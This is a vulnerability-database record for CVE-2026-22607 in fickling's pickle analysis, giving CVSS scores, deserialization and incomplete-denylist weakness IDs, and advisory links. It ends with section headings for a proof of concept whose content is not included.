  "id": "CVE-2026-22607",
  "lastModified": "2026-01-16T18:58:22.570",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "LOCAL",
          "availabilityImpact": "HIGH",
          "baseScore": 7.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 1.8,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ],
    "cvssMetricV40": [
      {
        "cvssData": {
          "Automatable": "NOT_DEFINED",
          "Recovery": "NOT_DEFINED",
          "Safety": "NOT_DEFINED",
          "attackComplexity": "LOW",
          "attackRequirements": "NONE",
          "attackVector": "NETWORK",
          "availabilityRequirement": "NOT_DEFINED",
          "baseScore": 8.9,
          "baseSeverity": "HIGH",
          "confidentialityRequirement": "NOT_DEFINED",
          "exploitMaturity": "PROOF_OF_CONCEPT",
          "integrityRequirement": "NOT_DEFINED",
          "modifiedAttackComplexity": "NOT_DEFINED",
          "modifiedAttackRequirements": "NOT_DEFINED",
          "modifiedAttackVector": "NOT_DEFINED",
          "modifiedPrivilegesRequired": "NOT_DEFINED",
          "modifiedSubAvailabilityImpact": "NOT_DEFINED",
          "modifiedSubConfidentialityImpact": "NOT_DEFINED",
          "modifiedSubIntegrityImpact": "NOT_DEFINED",
          "modifiedUserInteraction": "NOT_DEFINED",
          "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
          "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
          "modifiedVulnIntegrityImpact": "NOT_DEFINED",
          "privilegesRequired": "NONE",
          "providerUrgency": "NOT_DEFINED",
          "subAvailabilityImpact": "NONE",
          "subConfidentialityImpact": "NONE",
          "subIntegrityImpact": "NONE",
          "userInteraction": "NONE",
          "valueDensity": "NOT_DEFINED",
          "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "version": "4.0",
          "vulnAvailabilityImpact": "HIGH",
          "vulnConfidentialityImpact": "HIGH",
          "vulnIntegrityImpact": "HIGH",
          "vulnerabilityResponseEffort": "NOT_DEFINED"
        },
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-01-10T02:15:49.780",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/trailofbits/fickling/commit/dc8ae12966edee27a78fe05c5745171a2b138d43"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Release Notes"
      ],
      "url": "https://github.com/trailofbits/fickling/releases/tag/v0.1.7"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/trailofbits/fickling/security/advisories/GHSA-p523-jq9w-64x9"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/trailofbits/fickling/security/advisories/GHSA-p523-jq9w-64x9"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-184"
        },
        {
          "lang": "en",
          "value": "CWE-502"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-22607 (GCVE-0-2026-22607)

GHSA-P523-JQ9W-64X9

Fickling's assessment

Original report

Description

Summary

Details

PoC

Step 1: Create malicious pickle

Step 2: Analyze with fickling

Step 3: Prove RCE by loading the pickle

Pickle disassembly (evidence):

Impact

FKIE_CVE-2026-22607

Tags

Sightings

Nomenclature